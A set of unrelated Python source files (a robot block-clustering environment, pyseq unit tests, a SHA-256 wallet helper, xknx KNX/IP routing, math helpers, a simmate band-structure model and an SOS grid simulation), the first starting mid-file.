# rescale so that frac_correct <= thresh gives 0 score, frac_correct ==
# 1.0 gives 1 score. I've found it's common to frac_correct ranging
# from 0.2 up to 0.4 just from random init; this clipping process means
# that random init gives close to 0 average score.
frac_correct = float(n_correct) / max(n_blocks, 1)
thresh = 0.75
score = max(frac_correct - thresh, 0) / (1 - thresh)
return score
class ClusterColourEnv(BaseClusterEnv, EzPickle):
DEFAULT_ROBOT_POSE = ((0.71692, -0.34374), 0.83693)
DEFAULT_BLOCK_COLOURS = [
en.ShapeColour.BLUE,
en.ShapeColour.BLUE,
en.ShapeColour.BLUE,
en.ShapeColour.GREEN,
en.ShapeColour.GREEN,
en.ShapeColour.RED,
en.ShapeColour.YELLOW,
en.ShapeColour.YELLOW,
]
DEFAULT_BLOCK_SHAPES = [
en.ShapeType.CIRCLE,
en.ShapeType.STAR,
en.ShapeType.SQUARE,
en.ShapeType.PENTAGON,
en.ShapeType.PENTAGON,
en.ShapeType.SQUARE,
en.ShapeType.STAR,
en.ShapeType.PENTAGON,
]
DEFAULT_BLOCK_POSES = [
((-0.5147, 0.14149), -0.38871),
((-0.1347, -0.71414), 1.0533),
((-0.74247, -0.097592), 1.1571),
((-0.077363, -0.42964), -0.64379),
((0.51978, 0.1853), -1.1762),
((-0.5278, -0.21642), 2.9356),
((-0.54039, 0.48292), 0.072818),
((-0.16761, 0.64303), -2.3255),
]
@ez_init()
def __init__(self, *args, **kwargs):
super().__init__(*args,
cluster_by=BaseClusterEnv.ClusterBy.COLOUR,
**kwargs)
class ClusterShapeEnv(BaseClusterEnv, EzPickle):
# demo variant
DEFAULT_ROBOT_POSE = ((0.286, -0.202), -1.878)
DEFAULT_BLOCK_COLOURS = [
en.ShapeColour.YELLOW,
en.ShapeColour.BLUE,
en.ShapeColour.RED,
en.ShapeColour.RED,
en.ShapeColour.GREEN,
en.ShapeColour.YELLOW,
en.ShapeColour.BLUE,
en.ShapeColour.GREEN,
]
DEFAULT_BLOCK_SHAPES = [
en.ShapeType.SQUARE,
en.ShapeType.PENTAGON,
en.ShapeType.PENTAGON,
en.ShapeType.PENTAGON,
en.ShapeType.CIRCLE,
en.ShapeType.STAR,
en.ShapeType.STAR,
en.ShapeType.CIRCLE,
]
DEFAULT_BLOCK_POSES = [
((-0.414, 0.297), -1.731),
((0.068, 0.705), 2.184),
((0.821, 0.220), 0.650),
((-0.461, -0.749), -2.673),
((0.867, -0.149), -2.215),
((-0.785, -0.140), -0.405),
((-0.305, -0.226), 1.341),
((0.758, -0.708), -2.140),
]
@ez_init()
def __init__(self, *args, **kwargs):
super().__init__(*args,
cluster_by=BaseClusterEnv.ClusterBy.TYPE,
**kwargs)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------------------------------
# Copyright (c) 2011-2015, Ryan Galloway (ryan@rsgalloway.com)
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# - Neither the name of the software nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# -----------------------------------------------------------------------------
import os
import re
import random
import unittest
import subprocess
import sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from pyseq import Item, Sequence, diff, uncompress, get_sequences
from pyseq import SequenceError
import pyseq
pyseq.default_format = '%h%r%t'
class ItemTestCase(unittest.TestCase):
"""tests the Item class
"""
def setUp(self):
"""set up the test
"""
self.test_path =\
os.path.abspath(os.path.join(os.sep,'mnt', 'S', 'Some','Path','to','a','file','with','numbers','file.0010.exr'))
def test_initializing_with_a_string(self):
"""testing if initializing an Item with a string showing the path of a
file is working properly
"""
i = Item(self.test_path)
self.assertTrue(isinstance(i, Item))
def test_path_attribute_is_working_properly(self):
"""testing if the path attribute is working properly
"""
i = Item(self.test_path)
self.assertEqual(
self.test_path,
i.path
)
def test_path_attribute_is_read_only(self):
"""testing if the path attribute is read only
"""
i = Item(self.test_path)
with self.assertRaises(AttributeError) as cm:
setattr(i, 'path', 'some value')
self.assertEqual(
str(cm.exception),
"can't set attribute"
)
def test_name_attribute_is_working_properly(self):
"""testing if the name attribute is working properly
"""
i = Item(self.test_path)
self.assertEqual(
i.name,
'file.0010.exr'
)
def test_name_attribute_is_read_only(self):
"""testing if the name attribute is read only
"""
i = Item(self.test_path)
with self.assertRaises(AttributeError) as cm:
setattr(i, 'name', 'some value')
self.assertEqual(
str(cm.exception),
"can't set attribute"
)
def test_dirname_attribute_is_working_properly(self):
"""testing if the dirname attribute is working properly
"""
i = Item(self.test_path)
self.assertEqual(
i.dirname,
os.path.dirname(self.test_path)
)
def test_dirname_attribute_is_read_only(self):
"""testing if the dirname attribute is read only
"""
i = Item(self.test_path)
with self.assertRaises(AttributeError) as cm:
setattr(i, 'dirname', 'some value')
self.assertEqual(
str(cm.exception),
"can't set attribute"
)
def test_digits_attribute_is_working_properly(self):
"""testing if the digits attribute is working properly
"""
i = Item(self.test_path)
self.assertEqual(
i.digits,
['0010']
)
def test_digits_attribute_is_read_only(self):
"""testing if the digits attribute is read only
"""
i = Item(self.test_path)
with self.assertRaises(AttributeError) as cm:
setattr(i, 'digits', 'some value')
self.assertEqual(
str(cm.exception),
"can't set attribute"
)
def test_parts_attribute_is_working_properly(self):
"""testing if the parts attribute is working properly
"""
i = Item(self.test_path)
self.assertEqual(
i.parts,
['file.', '.exr']
)
def test_parts_attribute_is_read_only(self):
"""testing if the parts attribute is read only
"""
i = Item(self.test_path)
with self.assertRaises(AttributeError) as cm:
setattr(i, 'parts', 'some value')
self.assertEqual(
str(cm.exception),
"can't set attribute"
)
def test_is_sibling_method_is_working_properly(self):
"""testing if the is_sibling() is working properly
"""
item1 = Item('/mnt/S/Some/Path/to/a/file/with/numbers/file.0010.exr')
item2 = Item('/mnt/S/Some/Path/to/a/file/with/numbers/file.0101.exr')
self.assertTrue(item1.is_sibling(item2))
self.assertTrue(item2.is_sibling(item1))
class SequenceTestCase(unittest.TestCase):
"""tests the pyseq
"""
def setUp(self):
"""set the test up
"""
self.files = ['file.0001.jpg', 'file.0002.jpg', 'file.0003.jpg']
def test_from_list(self):
"""testing if Sequence instance can be initialized with a list of file
names
"""
seq = Sequence(self.files)
self.assertEqual(
str(seq),
'file.1-3.jpg'
)
def test_appending_a_new_file(self):
"""testing if it is possible to append a new item to the list by giving
the file name
"""
seq = Sequence(self.files)
test_file = 'file.0006.jpg'
seq.append(test_file)
self.assertTrue(
seq.contains('file.0005.jpg')
)
self.assertTrue(
seq.contains(test_file)
)
self.assertFalse(
seq.contains('file.0015.jpg')
)
def test___setitem__(self):
s = Sequence(["file.01.ext", "file.05.ext"])
s[1] = "file.02.ext"
self.assertEqual(len(s), 2)
self.assertEqual(s[0], Item("file.01.ext"))
self.assertEqual(s[1], Item("file.02.ext"))
self.assertRaises(SequenceError, s.__setitem__, 0, "item.1.ext")
def test___add__(self):
s = Sequence(["file.01.ext"])
ns = s + Item("file.02.ext")
self.assertEqual(len(ns), 2)
self.assertEqual(ns[0], s[0])
self.assertEqual(ns[1], Item("file.02.ext"))
self.assertEqual(len(s), 1)
ns = s + "file.02.ext"
self.assertEqual(len(ns), 2)
self.assertEqual(ns[0], s[0])
self.assertEqual(ns[1], Item("file.02.ext"))
self.assertEqual(len(s), 1)
ns = s + ["file.02.ext"]
self.assertEqual(len(ns), 2)
self.assertEqual(ns[0], s[0])
self.assertEqual(ns[1], Item("file.02.ext"))
self.assertEqual(len(s), 1)
ns = s + Sequence(["file.02.ext"])
self.assertEqual(len(ns), 2)
self.assertEqual(ns[0], s[0])
self.assertEqual(ns[1], Item("file.02.ext"))
self.assertEqual(len(s), 1)
self.assertRaises(SequenceError, s.__add__, "item.01.ext")
self.assertRaises(TypeError, s.__add__, 1)
def test___iadd__(self):
s = Sequence(["file.01.ext"])
s += Item("file.02.ext")
self.assertEqual(len(s), 2)
self.assertEqual(s[0], s[0])
self.assertEqual(s[1], Item("file.02.ext"))
s = Sequence(["file.01.ext"])
s += "file.02.ext"
self.assertEqual(len(s), 2)
self.assertEqual(s[0], s[0])
self.assertEqual(s[1], Item("file.02.ext"))
s = Sequence(["file.01.ext"])
s += ["file.02.ext"]
self.assertEqual(len(s), 2)
self.assertEqual(s[0], s[0])
self.assertEqual(s[1], Item("file.02.ext"))
s = Sequence(["file.01.ext"])
s += Sequence(["file.02.ext"])
self.assertEqual(len(s), 2)
self.assertEqual(s[0], s[0])
self.assertEqual(s[1], Item("file.02.ext"))
def test___setslice___(self):
s = Sequence(["file.001.ext"])
s[1:2] = "file.002.ext"
self.assertEqual(len(s), 2)
self.assertEqual(s[0], Item("file.001.ext"))
self.assertEqual(s[1], Item("file.002.ext"))
s = Sequence(["file.001.ext"])
s[1:2] = Item("file.002.ext")
self.assertEqual(len(s), 2)
self.assertEqual(s[0], Item("file.001.ext"))
self.assertEqual(s[1], Item("file.002.ext"))
s = Sequence(["file.001.ext"])
s[1:2] = [Item("file.002.ext")]
self.assertEqual(len(s), 2)
self.assertEqual(s[0], Item("file.001.ext"))
self.assertEqual(s[1], Item("file.002.ext"))
s = Sequence(["file.001.ext"])
s[1:2] = Sequence([Item("file.002.ext")])
self.assertEqual(len(s), 2)
self.assertEqual(s[0], Item("file.001.ext"))
self.assertEqual(s[1], Item("file.002.ext"))
self.assertRaises(SequenceError, s.__setslice__, 1, 2, 'item.001.ext')
def test_insert(self):
s = Sequence(["file.001.ext"])
s.insert(0, "file.002.ext")
self.assertEqual(len(s), 2)
self.assertEqual(s[0], Item("file.002.ext"))
self.assertEqual(s[1], Item("file.001.ext"))
self.assertRaises(SequenceError, s.insert, 1, "item")
def test_extend(self):
s = Sequence(["file.001.ext"])
s.extend(["file.002.ext", "file.003.ext"])
self.assertEqual(len(s), 3)
self.assertEqual(s[0], Item("file.001.ext"))
self.assertEqual(s[1], Item("file.002.ext"))
self.assertEqual(s[2], Item("file.003.ext"))
self.assertRaises(SequenceError, s.extend, ["item"])
def test_includes_is_working_properly(self):
"""testing if Sequence.includes() method is working properly
"""
seq = Sequence(self.files)
self.assertTrue(seq.includes('file.0009.jpg'))
self.assertFalse(seq.includes('file.0009.pic'))
def test_contains_is_working_properly(self):
"""testing if Sequence.contains() method is working properly
"""
seq = Sequence(self.files)
self.assertFalse(seq.contains('file.0009.jpg'))
self.assertFalse(seq.contains('file.0009.pic'))
def test_format_is_working_properly_1(self):
"""testing if format is working properly
"""
seq = Sequence(self.files)
seq.append('file.0006.jpg')
self.assertEqual(
seq.format('%h%p%t %r (%R)'),
'file.%04d.jpg 1-6 ([1-3, 6])'
)
def test_format_is_working_properly_2(self):
"""testing if format is working properly
"""
seq = Sequence(self.files)
seq.append('file.0006.jpg')
self.assertEqual(
'file.0001-0006.jpg',
seq.format('%h%04s-%04e%t'),
)
self.assertEqual(
'file. 1- 6.jpg',
seq.format('%h%4s-%4e%t'),
)
def test_format_is_working_properly_3(self):
"""testing if format is working properly
"""
seq = Sequence(self.files)
seq.append('file.0006.jpg')
seq.append('file.0010.jpg')
self.assertEqual(
seq.format('%h%p%t %r (missing %M)'),
'file.%04d.jpg 1-10 (missing [4-5, 7-9])'
)
def test_format_directory_attribute(self):
dir_name = os.path.dirname(
os.path.abspath(self.files[0])) + os.sep
seq = Sequence(self.files)
self.assertEqual(
seq.format("%D"),
dir_name
)
def test__get_missing(self):
""" test that _get_missing works
"""
# Can't initialize Sequence without an item
# seq = Sequence([])
# self.assertEqual(seq._get_missing(), [])
seq = Sequence(["file.00010.jpg"])
self.assertEqual(seq._get_missing(), [])
seq = Sequence(self.files)
seq.append("file.0006.jpg")
self.assertEqual(seq._get_missing(), [4, 5])
seq = Sequence(["file.%04d.jpg" % i for i in xrange(20)])
seq.pop(10)
seq.pop(10)
seq.pop(10)
seq.pop(14)
seq.pop(14)
missing = [10, 11, 12, 17, 18]
self.assertEqual(seq._get_missing(), missing)
missing = []
seq = Sequence(["file.0001.jpg"])
for i in xrange(2, 50):
if random.randint(0, 1) == 1:
seq.append("file.%04d.jpg" % i)
else:
missing.append(i)
# remove ending random frames
while missing[-1] > int(re.search("file\.(\d{4})\.jpg", seq[-1]).group(1)):
missing.pop(-1)
self.assertEqual(seq._get_missing(), missing)
class HelperFunctionsTestCase(unittest.TestCase):
"""tests the helper functions like
pyseq.diff()
pyseq.uncompress()
pyseq.get_sequences()
"""
def test_diff_is_working_properly_1(self):
"""testing if diff is working properly
"""
self.assertEqual(
diff('file01_0040.rgb', 'file01_0041.rgb'),
[{'frames': ('0040', '0041'), 'start': 7, 'end': 11}]
)
def test_diff_is_working_properly_2(self):
"""testing if diff is working properly
"""
self.assertEqual(
diff('file3.03.rgb', 'file4.03.rgb'),
[{'frames': ('3', '4'), 'start': 4, 'end': 5}]
)
def test_uncompress_is_working_properly_1(self):
"""testing if uncompress is working properly
"""
seq = uncompress(
'./tests/files/012_vb_110_v001.%04d.png 1-10',
fmt='%h%p%t %r'
)
self.assertEqual(
'012_vb_110_v001.1-10.png',
str(seq)
)
self.assertEqual(10, len(seq))
def test_uncompress_is_working_properly_2(self):
"""testing if uncompress is working properly
"""
seq2 = uncompress(
'./tests/files/a.%03d.tga [1-3, 10, 12-14]',
fmt='%h%p%t %R'
)
self.assertEqual(
'a.1-14.tga',
str(seq2)
)
self.assertEqual(
7,
len(seq2)
)
def test_uncompress_is_working_properly_3(self):
"""testing if uncompress is working properly
"""
seq3 = uncompress(
'a.%03d.tga 1-14 ([1-3, 10, 12-14])',
fmt='%h%p%t %r (%R)'
)
self.assertEqual(
'a.1-14.tga',
str(seq3)
)
self.assertEqual(
7,
len(seq3)
)
def test_uncompress_is_working_properly_4(self):
"""testing if uncompress is working properly
"""
seq4 = uncompress(
'a.%03d.tga 1-14 ([1-3, 10, 12-14])',
fmt='%h%p%t %s-%e (%R)'
)
self.assertEqual(
'a.1-14.tga',
str(seq4)
)
def test_uncompress_is_working_properly_5(self):
"""testing if uncompress is working properly
"""
seq5 = uncompress('a.%03d.tga 1-14 [1-14]', fmt='%h%p%t %r %R')
self.assertEqual(
'a.1-14.tga',
str(seq5)
)
self.assertEqual(
14,
len(seq5)
)
def test_uncompress_is_working_properly_6(self):
"""testing if uncompress is working properly
"""
seq6 = uncompress('a.%03d.tga 1-14 ([1-14])', fmt='%h%p%t %r (%R)')
self.assertEqual(
'a.1-14.tga',
str(seq6)
)
self.assertEqual(
14,
len(seq6)
)
def test_uncompress_is_working_properly_7(self):
"""testing if uncompress is working properly
"""
seq7 = uncompress(
'a.%03d.tga 1-100000 ([1-10, 100000])',
fmt='%h%p%t %r (%R)'
)
self.assertEqual(
'a.1-100000.tga',
str(seq7)
)
self.assertEqual(
11,
len(seq7)
)
def test_uncompress_is_working_properly_8(self):
"""testing if uncompress is working properly
"""
seq8 = uncompress(
'a.%03d.tga 1-100 ([10, 20, 40, 50])',
fmt='%h%p%t %r (%m)'
)
self.assertEqual(
'a.1-100.tga',
str(seq8)
)
self.assertEqual(
96,
len(seq8)
)
def test_get_sequences_is_working_properly_1(self):
"""testing if get_sequences is working properly
"""
seqs = get_sequences('./files/')
expected_results = [
'012_vb_110_v001.1-10.png',
'012_vb_110_v002.1-10.png',
'a.1-14.tga',
'alpha.txt',
'bnc01_TinkSO_tx_0_ty_0.101-105.tif',
'bnc01_TinkSO_tx_0_ty_1.101-105.tif',
'bnc01_TinkSO_tx_1_ty_0.101-105.tif',
'bnc01_TinkSO_tx_1_ty_1.101-105.tif',
'file.1-2.tif',
'file.info.03.rgb',
'file01.1-4.j2k',
'file01_40-43.rgb',
'file02_44-47.rgb',
'file1-4.03.rgb',
'fileA.1-3.jpg',
'fileA.1-3.png',
'file_02.tif',
'z1_001_v1.1-4.png',
'z1_002_v1.1-4.png',
'z1_002_v2.1-4.png',
]
for seq, expected_result in zip(seqs, expected_results):
self.assertEqual(
expected_result,
str(seq)
)
def test_get_sequences_is_working_properly_2(self):
"""testing if get_sequences is working properly
"""
seqs = get_sequences(['fileA.1.rgb', 'fileA.2.rgb', 'fileB.1.rgb'])
expected_results = [
'fileA.1-2.rgb',
'fileB.1.rgb'
]
for seq, expected_result in zip(seqs, expected_results):
self.assertEqual(
expected_result,
str(seq)
)
def test_get_sequences_is_working_properly_3(self):
"""testing if get_sequences is working properly
"""
seqs = get_sequences('./tests/files/bnc*')
expected_results = [
'bnc01_TinkSO_tx_0_ty_0.%04d.tif 101-105',
'bnc01_TinkSO_tx_0_ty_1.%04d.tif 101-105',
'bnc01_TinkSO_tx_1_ty_0.%04d.tif 101-105',
'bnc01_TinkSO_tx_1_ty_1.%04d.tif 101-105',
]
for seq, expected_result in zip(seqs, expected_results):
self.assertEqual(
expected_result,
seq.format('%h%p%t %r')
)
class LSSTestCase(unittest.TestCase):
"""Tests lss command
"""
def run_command(self, *args):
"""a simple wrapper for subprocess.Popen
"""
process = subprocess.Popen(args, stdout=subprocess.PIPE, universal_newlines=True)
# loop until process finishes and capture stderr output
stdout_buffer = []
while True:
stdout = process.stdout.readline()
if stdout == b'' and process.poll() is not None:
break
if stdout != b'':
stdout_buffer.append(stdout)
# flatten the buffer
return b''.join(stdout_buffer)
def setUp(self):
"""
"""
self.here = os.path.dirname(__file__)
self.lss = os.path.realpath(os.path.join(os.path.dirname(self.here), 'lss'))
def test_lss_is_working_properly_1(self):
"""testing if the lss command is working properly
"""
test_files = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"files"
)
result = self.run_command(
self.lss,
test_files
)
self.assertEqual(""" 10 012_vb_110_v001.%04d.png [1-10]
10 012_vb_110_v002.%04d.png [1-10]
7 a.%03d.tga [1-3, 10, 12-14]
1 alpha.txt
5 bnc01_TinkSO_tx_0_ty_0.%04d.tif [101-105]
5 bnc01_TinkSO_tx_0_ty_1.%04d.tif [101-105]
5 bnc01_TinkSO_tx_1_ty_0.%04d.tif [101-105]
5 bnc01_TinkSO_tx_1_ty_1.%04d.tif [101-105]
2 file.%02d.tif [1-2]
1 file.info.03.rgb
3 file01.%03d.j2k [1-2, 4]
4 file01_%04d.rgb [40-43]
4 file02_%04d.rgb [44-47]
4 file%d.03.rgb [1-4]
3 fileA.%04d.jpg [1-3]
3 fileA.%04d.png [1-3]
1 file_02.tif
4 z1_001_v1.%d.png [1-4]
4 z1_002_v1.%d.png [1-4]
4 z1_002_v2.%d.png [1-4]
""",
result
)
if __name__ == '__main__':
unittest.main() |
# Simple Wallet
# Copyright (c) 2022 Mystic Technology LLC
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import hashlib
from typing import Union
from ..utils.conversion import to_bytes
class Sha256:
@classmethod
def hash(self, x: Union[bytes, str]) -> bytes:
x = to_bytes(x, 'utf8')
return bytes(hashlib.sha256(x).digest())
@classmethod
def hashd(self, x: Union[bytes, str]) -> bytes:
x = to_bytes(x, 'utf8')
out = bytes(self.hash(self.hash(x)))
return out |
"""
Abstraction for handling KNX/IP routing.
Routing uses UDP Multicast to broadcast and receive KNX/IP messages.
"""
from __future__ import annotations
import logging
from typing import TYPE_CHECKING, Callable
from xknx.knxip import (
CEMIFrame,
CEMIMessageCode,
KNXIPFrame,
KNXIPServiceType,
RoutingIndication,
)
from xknx.telegram import TelegramDirection
from .interface import Interface
from .udp_client import UDPClient
if TYPE_CHECKING:
from xknx.telegram import Telegram
from xknx.xknx import XKNX
TelegramCallbackType = Callable[[Telegram], None]
logger = logging.getLogger("xknx.log")
class Routing(Interface):
"""Class for handling KNX/IP routing."""
def __init__(
self,
xknx: XKNX,
telegram_received_callback: TelegramCallbackType,
local_ip: str,
):
"""Initialize Routing class."""
self.xknx = xknx
self.telegram_received_callback = telegram_received_callback
self.local_ip = local_ip
self.udpclient = UDPClient(
self.xknx,
(local_ip, 0),
(self.xknx.multicast_group, self.xknx.multicast_port),
multicast=True,
)
self.udpclient.register_callback(
self.response_rec_callback, [KNXIPServiceType.ROUTING_INDICATION]
)
def response_rec_callback(self, knxipframe: KNXIPFrame, _: UDPClient) -> None:
"""Verify and handle knxipframe. Callback from internal udpclient."""
if not isinstance(knxipframe.body, RoutingIndication):
logger.warning("Service type not implemented: %s", knxipframe)
elif knxipframe.body.cemi is None:
# ignore unsupported CEMI frame
return
elif knxipframe.body.cemi.src_addr == self.xknx.own_address:
logger.debug("Ignoring own packet")
else:
telegram = knxipframe.body.cemi.telegram
telegram.direction = TelegramDirection.INCOMING
if self.telegram_received_callback is not None:
self.telegram_received_callback(telegram)
async def send_telegram(self, telegram: "Telegram") -> None:
"""Send Telegram to routing connected device."""
cemi = CEMIFrame.init_from_telegram(
self.xknx,
telegram=telegram,
code=CEMIMessageCode.L_DATA_IND,
src_addr=self.xknx.own_address,
)
routing_indication = RoutingIndication(self.xknx, cemi=cemi)
await self.send_knxipframe(KNXIPFrame.init_from_body(routing_indication))
async def send_knxipframe(self, knxipframe: KNXIPFrame) -> None:
"""Send KNXIPFrame to connected routing device."""
self.udpclient.send(knxipframe)
async def connect(self) -> bool:
"""Start routing."""
try:
await self.udpclient.connect()
except OSError as ex:
logger.debug(
"Could not establish connection to KNX/IP network. %s: %s",
type(ex).__name__,
ex,
)
# close udp client to prevent open file descriptors
await self.udpclient.stop()
raise ex
self.xknx.connected.set()
return True
async def disconnect(self) -> None:
"""Stop routing."""
await self.udpclient.stop()
self.xknx.connected.clear()
|
# random mathy functions
def isPalindrome(s: str) -> bool:
return s == s[::-1]
import math
def isPerfectSquare(n: int) -> bool:
return math.isqrt(n) ** 2 == n |
# -*- coding: utf-8 -*-
import os
from pymatgen.io.vasp.outputs import Vasprun
from pymatgen.electronic_structure.bandstructure import (
BandStructureSymmLine as ToolkitBandStructure,
)
from pymatgen.electronic_structure.plotter import BSPlotter
from simmate.database.base_data_types import (
table_column,
DatabaseTable,
Calculation,
Structure,
)
class BandStructure(DatabaseTable):
"""
The electronic band structure holds information about the range of energy
levels that are available within a material.
"""
class Meta:
abstract = True
base_info = ["band_structure_data"]
# kpt_path_type (setyawan_curtarolo, hinuma, latimer_munro)
# Maybe set as an abstract property?
band_structure_data = table_column.JSONField(blank=True, null=True)
"""
A JSON dictionary holding all information for the band structure. This JSON
is generated using pymatgen's
`vasprun.get_band_structure(line_mode=True).as_dict()` and is therefore
currently unoptimized for small storage.
"""
nbands = table_column.IntegerField(blank=True, null=True)
"""
The number of bands used in this calculation.
"""
band_gap = table_column.FloatField(blank=True, null=True)
"""
The band gap energy in eV.
"""
is_gap_direct = table_column.BooleanField(blank=True, null=True)
"""
Whether the band gap is direct or indirect.
"""
band_gap_direct = table_column.FloatField(blank=True, null=True)
"""
The direct band gap energy in eV.
"""
energy_fermi = table_column.FloatField(blank=True, null=True)
"""
The Fermi energy in eV.
"""
conduction_band_minimum = table_column.FloatField(blank=True, null=True)
"""
The conduction band minimum in eV.
"""
valence_band_maximum = table_column.FloatField(blank=True, null=True)
"""
The valence band maximum in eV.
"""
is_metal = table_column.BooleanField(blank=True, null=True)
"""
Whether the material is a metal.
"""
# TODO: consider adding...
# magnetic_ordering (Magnetic ordering of the calculation.)
# equivalent_labels (Equivalent k-point labels in other k-path conventions)
@classmethod
def _from_toolkit(
cls,
band_structure: ToolkitBandStructure = None,
as_dict: bool = False,
):
# Given energy, this function builds the rest of the required fields
# for this class as an object (or as a dictionary).
data = (
dict(
band_structure_data=band_structure.as_dict(),
nbands=band_structure.nb_bands,
band_gap=band_structure.get_band_gap()["energy"],
is_gap_direct=band_structure.get_band_gap()["direct"],
band_gap_direct=band_structure.get_direct_band_gap(),
energy_fermi=band_structure.efermi,
conduction_band_minimum=band_structure.get_cbm()["energy"],
valence_band_maximum=band_structure.get_vbm()["energy"],
is_metal=band_structure.is_metal(),
)
if band_structure
else {}
)
# If as_dict is false, we build this into an Object. Otherwise, just
# return the dictionary
return data if as_dict else cls(**data)
def to_toolkit_band_structure(self) -> ToolkitBandStructure:
"""
Converts this DatabaseTable object into a toolkit BandStructure, which
has many more methods for plotting and analysis.
"""
return ToolkitBandStructure.from_dict(self.band_structure_data)
def get_bandstructure_plot(self): # -> matplotlib figure
"""
Plots the band structure using matplotlib
"""
# NOTE: This method should be moved to a toolkit object
# DEV NOTE: Pymatgen only implements matplotlib for their band-structures
# at the moment, but there are two scripts location elsewhere that can
# outline how this can be done with Plotly:
# https://plotly.com/python/v3/ipython-notebooks/density-of-states/
# https://github.com/materialsproject/crystaltoolkit/blob/main/crystal_toolkit/components/bandstructure.py
bs_plotter = BSPlotter(self.to_toolkit_band_structure())
plot = bs_plotter.get_plot()
return plot
class BandStructureCalc(Structure, BandStructure, Calculation):
"""
Holds Structure, BandStructure, and Calculation information. Band-structure
workflows are common in materials science, so this table defines the most
common data that results from such workflow calculations.
"""
class Meta:
abstract = True
app_label = "workflows"
base_info = Structure.base_info + BandStructure.base_info + Calculation.base_info
def update_from_vasp_run(
self,
vasprun: Vasprun,
corrections: list,
directory: str,
):
"""
Given a pymatgen VaspRun object, which is what's typically returned
from a simmate VaspTask.run() call, this will update the database entry
with the results.
"""
# All data analysis is done via a BandStructure object, so we convert
# the vasprun object to that first.
band_structure = vasprun.get_band_structure(line_mode=True)
# Take our band_structure and expand its data for the rest of the columns.
new_kwargs = BandStructure.from_toolkit(
band_structure=band_structure,
as_dict=True,
)
for key, value in new_kwargs.items():
setattr(self, key, value)
# lastly, we also want to save the corrections made and directory it ran in
self.corrections = corrections
self.directory = directory
# Now we have the relaxation data all loaded and can save it to the database
self.save()
@classmethod
def from_directory(cls, directory: str):
"""
Creates a new database entry from a directory that holds band-structure
results. For now, this assumes the directory holds vasp output files.
"""
# I assume the directory is from a vasp calculation, but I need to update
# this when I begin adding new calculators.
vasprun_filename = os.path.join(directory, "vasprun.xml")
vasprun = Vasprun(vasprun_filename)
band_structure = vasprun.get_band_structure(line_mode=True)
band_structure_db = cls.from_toolkit(
structure=vasprun.structures[0],
band_structure=band_structure,
)
band_structure_db.save()
return band_structure_db
|
import random
import math
diastaseis = True # Elegxw oti panta exw orthogwnio
while diastaseis == True:
rows = int(input("Mikos?"))
cols = int(input("Platos?"))
if rows == cols:
print("Theloume orthogwnio pinaka kai oxi tetragwno! Ksanaprospathise!")
else:
diastaseis = False
ori = 0
ka = 0
dia = 0
for z in range(100):
arr = []
pinakas_sos = []
misa = math.ceil(rows * cols / 2) # strogkilopoihsh pros ta panw
for i in range(misa):
pinakas_sos.append("s")
pinakas_sos.append("o")
o = 0
s = 0
while o == s:
for i in range(cols):
col = []
for j in range(rows):
stoixeio = random.choice(pinakas_sos) # pairnw tyxaia "s" h "o"
col.append(stoixeio)
if stoixeio == "o":
o += 1
elif stoixeio == "s":
s += 1
arr.append(col)
#print(arr[i])
#print(misa)
#print(arr)
oriz = 0
kath = 0
diag = 0
for i in range(cols):
for j in range(rows):
if j < rows-2:
if arr[i][j] == "s":
if arr[i][j + 1] == "o":
if arr[i][j + 2] == "s":
oriz += 1 # Orizontia sos
ori += 1
if i < cols - 2:
if arr[i][j] == "s":
if arr[i + 1][j] == "o":
if arr[i + 2][j] == "s":
kath += 1 # Katheta sos
ka += 1
if cols >= 2 and rows >= 2:
if (i < cols - 2) and (j < rows - 2):
if arr[i][j] == "s":
if arr[i + 1][j + 1] == "o":
if arr[i + 2][j + 2] == "s":
diag += 1 # diagwnia sos
dia += 1
if cols >= 2 and rows >= 2:
if(j > 1) and (i < cols - 2):
if arr[i][j] == "s":
if arr[i + 1][j - 1] == "o":
if arr[i + 2][j - 2] == "s":
diag += 1 # diagwnia sos
dia += 1
#print("thn", z, "fora to athroisma twn sos einai", oriz + kath + diag)
pl_sos = ori + ka + dia # synolika sos
